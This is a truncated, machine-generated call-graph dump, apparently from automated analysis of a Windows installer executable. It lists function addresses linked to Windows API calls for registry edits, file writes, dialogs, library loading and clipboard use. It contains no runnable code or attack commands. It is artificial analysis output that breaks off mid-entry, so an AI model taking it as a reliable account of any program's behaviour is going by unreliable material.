4379->4383 4381 402eb1 4380->4381 4382 402f2c CloseHandle 4380->4382 4401 403368 SetFilePointer 4381->4401 4382->4379 4385 402f45 4383->4385 4387 402f50 DeleteFileW 4385->4387 4388 402f63 4385->4388 4386 402eb7 4389 403336 ReadFile 4386->4389 4387->4388 4402 401435 4388->4402 4391 402ec0 GlobalAlloc 4389->4391 4392 402ed0 4391->4392 4393 402f04 WriteFile GlobalFree 4391->4393 4395 40337f 33 API calls 4392->4395 4394 40337f 33 API calls 4393->4394 4396 402f29 4394->4396 4399 402edd 4395->4399 4396->4382 4398 402efb GlobalFree 4398->4393 4399->4398 4400->4378 4401->4386 4403 404f9e 25 API calls 4402->4403 4404 401443 4403->4404 4405 401cd5 4406 401446 18 API calls 4405->4406 4407 401cdd 4406->4407 4408 401446 18 API calls 4407->4408 4409 401ce8 4408->4409 4410 40145c 18 API calls 4409->4410 4411 401cf1 4410->4411 4412 401d07 lstrlenW 4411->4412 4413 401d43 4411->4413 4414 401d11 4412->4414 4414->4413 4418 406035 lstrcpynW 4414->4418 4416 401d2c 4416->4413 4417 401d39 lstrlenW 4416->4417 4417->4413 4418->4416 4419 402cd7 4420 401446 18 API calls 4419->4420 4422 402c64 4420->4422 4421 402d17 ReadFile 4421->4422 4422->4419 4422->4421 4423 402d99 4422->4423 4424 402dd8 4425 4030e3 4424->4425 4426 402ddf 4424->4426 4427 402de5 FindClose 4426->4427 4427->4425 4428 401d5c 4429 40145c 18 API calls 4428->4429 4430 401d63 4429->4430 4431 40145c 18 API calls 4430->4431 4432 401d6c 4431->4432 4433 401d73 lstrcmpiW 4432->4433 4434 401d86 lstrcmpW 4432->4434 4435 401d79 4433->4435 4434->4435 4436 401c99 4434->4436 4435->4434 4435->4436 4437 4027e3 4438 4027e9 4437->4438 4439 4027f2 4438->4439 4440 402836 4438->4440 4453 401553 4439->4453 4441 40145c 18 API calls 4440->4441 4443 40283d 4441->4443 4445 4062cf 11 API calls 4443->4445 4444 4027f9 4446 40145c 18 API calls 4444->4446 4450 401a13 4444->4450 4447 40284d 4445->4447 4448 40280a RegDeleteValueW 4446->4448 4457 40149d RegOpenKeyExW 4447->4457 4449 4062cf 11 API calls 4448->4449 4452 40282a RegCloseKey 4449->4452 4452->4450 4454 401563 4453->4454 4455 40145c 18 API calls 4454->4455 4456 401589 RegOpenKeyExW 4455->4456 4456->4444 4460 4014c9 4457->4460 4465 401515 4457->4465 4458 4014ef RegEnumKeyW 4459 401501 RegCloseKey 4458->4459 4458->4460 4462 406328 3 API calls 4459->4462 4460->4458 4460->4459 4461 401526 RegCloseKey 4460->4461 4463 40149d 3 API calls 4460->4463 4461->4465 4464 401511 4462->4464 4463->4460 4464->4465 4466 401541 RegDeleteKeyW 4464->4466 4465->4450 4466->4465 4467 4040e4 4468 4040ff 4467->4468 4474 40422d 4467->4474 4470 40413a 4468->4470 4498 403ff6 WideCharToMultiByte 4468->4498 4469 404298 4471 40436a 4469->4471 4472 4042a2 GetDlgItem 4469->4472 4478 403d6b 19 API calls 4470->4478 4479 403df6 8 API calls 4471->4479 4475 40432b 4472->4475 4476 4042bc 4472->4476 4474->4469 4474->4471 4477 404267 GetDlgItem SendMessageW 4474->4477 4475->4471 4480 40433d 4475->4480 4476->4475 4484 4042e2 6 API calls 4476->4484 4503 403db1 KiUserCallbackDispatcher 4477->4503 4482 40417a 4478->4482 4483 404365 4479->4483 4485 404353 4480->4485 4486 404343 SendMessageW 4480->4486 4488 403d6b 19 API calls 4482->4488 4484->4475 4485->4483 4489 404359 SendMessageW 4485->4489 4486->4485 4487 404293 4490 403d8d SendMessageW 4487->4490 4491 404187 CheckDlgButton 4488->4491 4489->4483 4490->4469 4501 403db1 KiUserCallbackDispatcher 4491->4501 4493 4041a5 GetDlgItem 4502 403dc4 SendMessageW 4493->4502 4495 4041bb SendMessageW 4496 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4495->4496 4497 4041d8 GetSysColor 4495->4497 4496->4483 4497->4496 4499 404033 4498->4499 4500 404015 GlobalAlloc WideCharToMultiByte 4498->4500 4499->4470 4500->4499 4501->4493 4502->4495 4503->4487 4504 402ae4 4505 402aeb 4504->4505 4506 4030e3 4504->4506 4507 402af2 CloseHandle 4505->4507 4507->4506 4508 402065 4509 401446 18 API calls 4508->4509 4510 40206d 4509->4510 4511 401446 18 API calls 4510->4511 4512 402076 GetDlgItem 4511->4512 4513 4030dc 4512->4513 4514 4030e3 4513->4514 4516 405f7d wsprintfW 4513->4516 4516->4514 4517 402665 4518 40145c 18 API calls 4517->4518 4519 40266b 4518->4519 4520 40145c 18 API calls 4519->4520 4521 402674 4520->4521 4522 40145c 18 API calls 4521->4522 4523 40267d 4522->4523 4524 4062cf 11 API calls 4523->4524 4525 40268c 4524->4525 4526 406301 2 API calls 4525->4526 4527 402695 4526->4527 4528 4026a6 lstrlenW lstrlenW 4527->4528 4530 404f9e 25 API calls 4527->4530 4532 4030e3 4527->4532 4529 404f9e 25 API calls 4528->4529 4531 4026e8 SHFileOperationW 4529->4531 4530->4527 4531->4527 4531->4532 4533 401c69 4534 40145c 18 API calls 4533->4534 4535 401c70 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 401c80 4536->4537 4538 405ccc MessageBoxIndirectW 4537->4538 4539 401a13 4538->4539 4540 402f6e 4541 402f72 4540->4541 4542 402fae 4540->4542 4544 4062cf 11 API calls 4541->4544 4543 40145c 18 API calls 4542->4543 4550 402f9d 4543->4550 4545 402f7d 4544->4545 4546 4062cf 11 API calls 4545->4546 4547 402f90 4546->4547 4548 402fa2 4547->4548 4549 402f98 4547->4549 4552 406113 9 API calls 4548->4552 4551 403ea0 5 API calls 4549->4551 4551->4550 4552->4550 4553 4023f0 4554 402403 4553->4554 4555 4024da 4553->4555 4556 40145c 18 API calls 4554->4556 4557 404f9e 25 API calls 4555->4557 4558 40240a 4556->4558 4561 4024f1 4557->4561 4559 40145c 18 API calls 4558->4559 4560 402413 4559->4560 4562 402429 LoadLibraryExW 4560->4562 4563 40241b GetModuleHandleW 4560->4563 4564 4024ce 4562->4564 4565 40243e 4562->4565 4563->4562 4563->4565 4567 404f9e 25 API calls 4564->4567 4577 406391 GlobalAlloc WideCharToMultiByte 4565->4577 4567->4555 4568 402449 4569 40248c 4568->4569 4570 40244f 4568->4570 4571 404f9e 25 API calls 4569->4571 4572 401435 25 API calls 4570->4572 4575 40245f 4570->4575 4573 402496 4571->4573 4572->4575 4574 4062cf 11 API calls 4573->4574 4574->4575 4575->4561 4576 4024c0 FreeLibrary 4575->4576 4576->4561 4578 4063c9 GlobalFree 4577->4578 4579 4063bc GetProcAddress 4577->4579 4578->4568 4579->4578 3416 402175 3426 401446 3416->3426 3418 40217c 3419 401446 18 API calls 3418->3419 3420 402186 3419->3420 3421 402197 3420->3421 3424 4062cf 11 API calls 3420->3424 3422 4021aa EnableWindow 3421->3422 3423 40219f ShowWindow 3421->3423 3425 4030e3 3422->3425 3423->3425 3424->3421 3427 406831 18 API calls 3426->3427 3428 401455 3427->3428 3428->3418 4580 4048f8 4581 404906 4580->4581 4582 40491d 4580->4582 4583 40490c 4581->4583 4598 404986 4581->4598 4584 40492b IsWindowVisible 4582->4584 4590 404942 4582->4590 4585 403ddb SendMessageW 4583->4585 4587 404938 4584->4587 4584->4598 4588 404916 4585->4588 4586 40498c CallWindowProcW 4586->4588 4599 40487a SendMessageW 4587->4599 4590->4586 4604 406035 lstrcpynW 4590->4604 4592 404971 4605 405f7d wsprintfW 4592->4605 4594 404978 4595 40141d 80 API calls 4594->4595 4596 40497f 4595->4596 4606 406035 lstrcpynW 4596->4606 4598->4586 4600 4048d7 SendMessageW 4599->4600 4601 40489d GetMessagePos ScreenToClient SendMessageW 4599->4601 4603 4048cf 4600->4603 4602 4048d4 4601->4602 4601->4603 4602->4600 4603->4590 4604->4592 4605->4594 4606->4598 3721 4050f9 3722 4052c1 3721->3722 3723 40511a GetDlgItem GetDlgItem GetDlgItem 3721->3723 3724 4052f2 3722->3724 3725 4052ca GetDlgItem CreateThread CloseHandle 3722->3725 3770 403dc4 SendMessageW 3723->3770 3727 405320 3724->3727 3729 405342 3724->3729 3730 40530c ShowWindow ShowWindow 3724->3730 3725->3724 3773 405073 OleInitialize 3725->3773 3731 40537e 3727->3731 3733 405331 3727->3733 3734 405357 ShowWindow 3727->3734 3728 40518e 3740 406831 18 API calls 3728->3740 3735 403df6 8 API calls 3729->3735 3772 403dc4 SendMessageW 3730->3772 3731->3729 3736 405389 SendMessageW 3731->3736 3737 403d44 SendMessageW 3733->3737 3738 405377 3734->3738 3739 405369 3734->3739 3745 4052ba 3735->3745 3744 4053a2 CreatePopupMenu 3736->3744 3736->3745 3737->3729 3743 403d44 SendMessageW 3738->3743 3741 404f9e 25 API calls 3739->3741 3742 4051ad 3740->3742 3741->3738 3746 4062cf 11 API calls 3742->3746 3743->3731 3747 406831 18 API calls 3744->3747 3748 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3748 3749 4053b2 AppendMenuW 3747->3749 3750 405203 SendMessageW SendMessageW 3748->3750 3751 40521f 3748->3751 3752 4053c5 GetWindowRect 3749->3752 3753 4053d8 3749->3753 3750->3751 3754 405232 3751->3754 3755 405224 SendMessageW 3751->3755 3756 4053df TrackPopupMenu 3752->3756 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3756->3745 3758 4053fd 3756->3758 3759 405242 3757->3759 3760 405419 SendMessageW 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3760->3760 3763 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3760->3763 3764 405261 ShowWindow 3761->3764 3765 40526e 3761->3765 3762->3745 3766 4052a2 SendMessageW SendMessageW 3762->3766 3767 40545b SendMessageW 3763->3767 3764->3765 3771 403dc4 SendMessageW 3765->3771 3766->3745 3767->3767 3768 405486 GlobalUnlock SetClipboardData CloseClipboard 3767->3768 3768->3745 3770->3728 3771->3762 3772->3727 3774 403ddb SendMessageW 3773->3774 3778 405096 3774->3778 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777 4062cf 11 API calls 3777->3778 3778->3777 3779 40139d 80 API calls 3778->3779 3780 4050c1 3778->3780 3779->3778 3780->3775 4607 4020f9 GetDC GetDeviceCaps 4608 401446 18 API calls 4607->4608 4609 402116 MulDiv 4608->4609 4610 401446 18 API calls 4609->4610 4611 40212c 4610->4611 4612 406831 18 API calls 4611->4612 4613 402165 CreateFontIndirectW 4612->4613 4614 4030dc 4613->4614 4615 4030e3 4614->4615 4617 405f7d wsprintfW 4614->4617 4617->4615 4618 4024fb 4619 40145c 18 API calls 4618->4619 4620 402502 4619->4620 4621 40145c 18 API calls 4620->4621 4622 40250c 4621->4622 4623 40145c 18 API calls 4622->4623 4624 402515 4623->4624 4625 40145c 18 API calls 4624->4625 4626 40251f 4625->4626 4627 40145c 18 API calls 4626->4627 4628 402529 4627->4628 4629 40253d 4628->4629 4630 40145c 18 API calls 4628->4630 4631 4062cf 11 API calls 4629->4631 4630->4629 4632 40256a CoCreateInstance 4631->4632 4633 40258c 4632->4633 4634 4026fc 4636 402708 4634->4636 4637 401ee4 4634->4637 4635 406831 18 API calls 4635->4637 4637->4634 4637->4635 3781 4019fd 3782 40145c 18 API calls 3781->3782 3783 401a04 3782->3783 3786 405eab 3783->3786 3787 405eb8 GetTickCount GetTempFileNameW 3786->3787 3788 401a0b 3787->3788 3789 405eee 3787->3789 3789->3787 3789->3788 4638 4022fd 4639 40145c 18 API calls 4638->4639 4640 402304 GetFileVersionInfoSizeW 4639->4640 4641 4030e3 4640->4641 4642 40232b GlobalAlloc 4640->4642 4642->4641 4643 40233f GetFileVersionInfoW 4642->4643 4644 402350 VerQueryValueW 4643->4644 4645 402381 GlobalFree 4643->4645 4644->4645 4646 402369 4644->4646 4645->4641 4651 405f7d wsprintfW 4646->4651 4649 402375 4652 405f7d wsprintfW 4649->4652 4651->4649 4652->4645 4653 402afd 4654 40145c 18 API calls 4653->4654 4655 402b04 4654->4655 4660 405e7c GetFileAttributesW CreateFileW 4655->4660 4657 402b10 4658 4030e3 4657->4658 4661 405f7d wsprintfW 4657->4661 4660->4657 4661->4658 4662 4029ff 4663 401553 19 API calls 4662->4663 4664 402a09 4663->4664 4665 40145c 18 API calls 4664->4665 4666 402a12 4665->4666 4667 402a1f RegQueryValueExW 4666->4667 4671 401a13 4666->4671 4668 402a45 4667->4668 4669 402a3f 4667->4669 4670 4029e4 RegCloseKey 4668->4670 4668->4671 4669->4668 4673 405f7d wsprintfW 4669->4673 4670->4671 4673->4668 4674 401000 4675 401037 BeginPaint GetClientRect 4674->4675 4676 40100c DefWindowProcW 4674->4676 4678 4010fc 4675->4678 4679 401182 4676->4679 4680 401073 CreateBrushIndirect FillRect DeleteObject 4678->4680 4681 401105 4678->4681 4680->4678 4682 401170 EndPaint 4681->4682 4683 40110b CreateFontIndirectW 4681->4683 4682->4679 4683->4682 4684 40111b 6 API calls 4683->4684 4684->4682 4685 401f80 4686 401446 18 API calls 4685->4686 4687 401f88 4686->4687 4688 401446 18 API calls 4687->4688 4689 401f93 4688->4689 4690 401fa3 4689->4690 4691 40145c 18 API calls 4689->4691 4692 401fb3 4690->4692 4693 40145c 18 API calls 4690->4693 4691->4690 4694 402006 4692->4694 4695 401fbc 4692->4695 4693->4692 4696 40145c 18 API calls 4694->4696 4697 401446 18 API calls 4695->4697 4698 40200d 4696->4698 4699 401fc4 4697->4699 4701 40145c 18 API calls 4698->4701 4700 401446 18 API calls 4699->4700 4702 401fce 4700->4702 4703 402016 FindWindowExW 4701->4703 4704 401ff6 SendMessageW 4702->4704 4705 401fd8 SendMessageTimeoutW 4702->4705 4707 402036 4703->4707 4704->4707 4705->4707 4706 4030e3 4707->4706 4709 405f7d wsprintfW 4707->4709 4709->4706 4710 402880 4711 402884 4710->4711 4712 40145c 18 API calls 4711->4712 4713 4028a7 4712->4713 4714 40145c 18 API calls 4713->4714 4715 4028b1 4714->4715 4716 4028ba RegCreateKeyExW 4715->4716 4717 4028e8 4716->4717 4722 4029ef 4716->4722 4718 402934 4717->4718 4720 40145c 18 API calls 4717->4720 4719 402963 4718->4719 4721 401446 18 API calls 4718->4721 4723 4029ae RegSetValueExW 4719->4723 4726 40337f 33 API calls 4719->4726 4724 4028fc lstrlenW 4720->4724 4725 402947 4721->4725 4729 4029c6 RegCloseKey 4723->4729 4730 4029cb 4723->4730 4727 402918 4724->4727 4728 40292a 4724->4728 4732 4062cf 11 API calls 4725->4732 4733 40297b 4726->4733 4734 4062cf 11 API calls 4727->4734 4735 4062cf 11 API calls 4728->4735 4729->4722 4731 4062cf 11 API calls 4730->4731 4731->4729 4732->4719 4741 406250 4733->4741 4738 402922 4734->4738 4735->4718 4738->4723 4740 4062cf 11 API calls 4740->4738 4742 406273 4741->4742 4743 4062b6 4742->4743 4744 406288 wsprintfW 4742->4744 4745 402991 4743->4745 4746 4062bf lstrcatW 4743->4746 4744->4743 4744->4744 4745->4740 4746->4745 4747 403d02 4748 403d0d 4747->4748 4749 403d11 4748->4749 4750 403d14 GlobalAlloc 4748->4750 4750->4749 4751 402082 4752 401446 18 API calls 4751->4752 4753 402093 SetWindowLongW 4752->4753 4754 4030e3 4753->4754 4755 402a84 4756 401553 19 API calls 4755->4756 4757 402a8e 4756->4757 4758 401446 18 API calls 4757->4758 4759 402a98 4758->4759 4760 401a13 4759->4760 4761 402ab2 RegEnumKeyW 4759->4761 4762 402abe RegEnumValueW 4759->4762 4763 402a7e 4761->4763 4762->4760 4762->4763 4763->4760 4764 4029e4 RegCloseKey 4763->4764 4764->4760 4765 402c8a 4766 402ca2 4765->4766 4767 402c8f 4765->4767 4769 40145c 18 API calls 4766->4769 4768 401446 18 API calls 4767->4768 4771 402c97 4768->4771 4770 402ca9 lstrlenW 4769->4770 4770->4771 4772 401a13 4771->4772 4773 402ccb WriteFile 4771->4773 4773->4772 4774 401d8e 4775 40145c 18 API calls 4774->4775 4776 401d95 ExpandEnvironmentStringsW 4775->4776 4777 401da8 4776->4777 4778 401db9 4776->4778 4777->4778 4779 401dad lstrcmpW 4777->4779 4779->4778 4780 401e0f 4781 401446 18 API calls 4780->4781 4782 401e17 4781->4782 4783 401446 18 API calls 4782->4783 4784 401e21 4783->4784 4785 4030e3 4784->4785 4787 405f7d wsprintfW 4784->4787 4787->4785 4788 40438f 4789 4043c8 4788->4789 4790 40439f 4788->4790 4791 403df6 8 API calls 4789->4791 4792 403d6b 19 API calls 4790->4792 4794 4043d4 4791->4794 4793 4043ac SetDlgItemTextW 4792->4793 4793->4789 4795 403f90 4796 403fa0 4795->4796 4797 403fbc 4795->4797 4806 405cb0 GetDlgItemTextW 4796->4806 4799 403fc2 SHGetPathFromIDListW 4797->4799 4800 403fef 4797->4800 4802 403fd2 4799->4802 4805 403fd9 SendMessageW 4799->4805 4801 403fad SendMessageW 4801->4797 4803 40141d 80 API calls 4802->4803 4803->4805 4805->4800 4806->4801 4807 402392 4808 40145c 18 API calls 4807->4808 4809 402399 4808->4809 4812 407224 4809->4812 4813 406efe 25 API calls 4812->4813 4814 407244 4813->4814 4815 4023a7 4814->4815 4816 40724e lstrcpynW lstrcmpW 4814->4816 4817 407280 4816->4817 4818 407286 lstrcpynW 4816->4818 4817->4818 4818->4815 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4819 402797 4820 40145c 18 API calls 4819->4820 4821 4027ae 4820->4821 4822 40145c 18 API calls 4821->4822 4823 4027b7 4822->4823 4824 40145c 18 API calls 4823->4824 4825 4027c0 GetPrivateProfileStringW lstrcmpW 4824->4825 4826 401e9a 4827 40145c 18 API calls 4826->4827 4828 401ea1 4827->4828 4829 401446 18 API calls 4828->4829 4830 401eab wsprintfW 4829->4830 3790 401a1f 3791 40145c 18 API calls 3790->3791 3792 401a26 3791->3792 3793 4062cf 11 API calls 3792->3793 3794 401a49 3793->3794 3795 401a64 3794->3795 3796 401a5c 3794->3796 3865 406035 lstrcpynW 3795->3865 3864 406035 lstrcpynW 3796->3864 3799 401a6f 3866 40674e lstrlenW CharPrevW 3799->3866 3800 401a62 3803 406064 5 API calls 3800->3803 3834 401a81 3803->3834 3804 406301 2 API calls 3804->3834 3807 401a98 CompareFileTime 3807->3834 3808 401ba9 3809 404f9e 25 API calls 3808->3809 3811 401bb3 3809->3811 3810 401b5d 3812 404f9e 25 API calls 3810->3812 3843 40337f 3811->3843 3814 401b70 3812->3814 3818 4062cf 11 API calls 3814->3818 3816 406035 lstrcpynW 3816->3834 3817 4062cf 11 API calls 3819 401bda 3817->3819 3823 401b8b 3818->3823 3820 401be9 SetFileTime 3819->3820 3821 401bf8 CloseHandle 3819->3821 3820->3821 3821->3823 3824 401c09 3821->3824 3822 406831 18 API calls 3822->3834 3825 401c21 3824->3825 3826 401c0e 3824->3826 3827 406831 18 API calls 3825->3827 3828 406831 18 API calls 3826->3828 3829 401c29 3827->3829 3831 401c16 lstrcatW 3828->3831 3832 4062cf 11 API calls 3829->3832 3831->3829 3835 401c34 3832->3835 3833 401b50 3837 401b93 3833->3837 3838 401b53 3833->3838 3834->3804 3834->3807 3834->3808 3834->3810 3834->3816 3834->3822 3834->3833 3836 4062cf 11 API calls 3834->3836 3842 405e7c GetFileAttributesW CreateFileW 3834->3842 3869 405e5c GetFileAttributesW 3834->3869 3872 405ccc 3834->3872 3839 405ccc MessageBoxIndirectW 3835->3839 3836->3834 3840 4062cf 11 API calls 3837->3840 3841 4062cf 11 API calls 3838->3841 3839->3823 3840->3823 3841->3810 3842->3834 3844 40339a 3843->3844 3845 4033c7 3844->3845 3878 403368 SetFilePointer 3844->3878 3876 403336 ReadFile 3845->3876 3849 401bc6 3849->3817 3850 403546 3852 40354a 3850->3852 3853 40356e 3850->3853 3851 4033eb GetTickCount 3851->3849 3856 403438 3851->3856 3854 403336 ReadFile 3852->3854 3853->3849 3857 403336 ReadFile 3853->3857 3858 40358d WriteFile 3853->3858 3854->3849 3855 403336 ReadFile 3855->3856 3856->3849 3856->3855 3860 40348a GetTickCount 3856->3860 3861 4034af MulDiv wsprintfW 3856->3861 3863 4034f3 WriteFile 3856->3863 3857->3853 3858->3849 3859 4035a1 3858->3859 3859->3849 3859->3853 3860->3856 3862 404f9e 25 API calls 3861->3862 3862->3856 3863->3849 3863->3856 3864->3800 3865->3799 3867 401a75 lstrcatW 3866->3867 3868 40676b lstrcatW 3866->3868 3867->3800 3868->3867 3870 405e79 3869->3870 3871 405e6b SetFileAttributesW 3869->3871 3870->3834 3871->3870 3873 405ce1 3872->3873 3874 405d2f 3873->3874 3875 405cf7 MessageBoxIndirectW 3873->3875 3874->3834 3875->3874 3877 403357 3876->3877 3877->3849 3877->3850 3877->3851 3878->3845 4831 40209f GetDlgItem GetClientRect 4832 40145c 18 API calls 4831->4832 4833 4020cf LoadImageW SendMessageW 4832->4833 4834 4030e3 4833->4834 4835 4020ed DeleteObject 4833->4835 4835->4834 4836 402b9f 4837 401446 18 API calls 4836->4837 4841 402ba7 4837->4841 4838 402c4a 4839 402bdf ReadFile 4839->4841 4848 402c3d 4839->4848 4840 401446 18 API calls 4840->4848 4841->4838 4841->4839 4842 402c06 MultiByteToWideChar 4841->4842 4843 402c3f 4841->4843 4844 402c4f 4841->4844 4841->4848 4842->4841 4842->4844 4849 405f7d wsprintfW 4843->4849 4846 402c6b SetFilePointer 4844->4846 4844->4848 4846->4848 4847 402d17 ReadFile 4847->4848 4848->4838 4848->4840 4848->4847 4849->4838 4850 402b23 GlobalAlloc 4851 402b39 4850->4851 4852 402b4b 4850->4852 4853 401446 18 API calls 4851->4853 4854 40145c 18 API calls 4852->4854 4856 402b41 4853->4856 4855 402b52 WideCharToMultiByte lstrlenA 4854->4855 4855->4856 4857 402b84 WriteFile 4856->4857 4858 402b93 4856->4858 4857->4858 4859 402384 GlobalFree 4857->4859 4859->4858 4861 4040a3 4862 4040b0 lstrcpynW lstrlenW 4861->4862 4863 4040ad 4861->4863 4863->4862 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a DestroyWindow KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 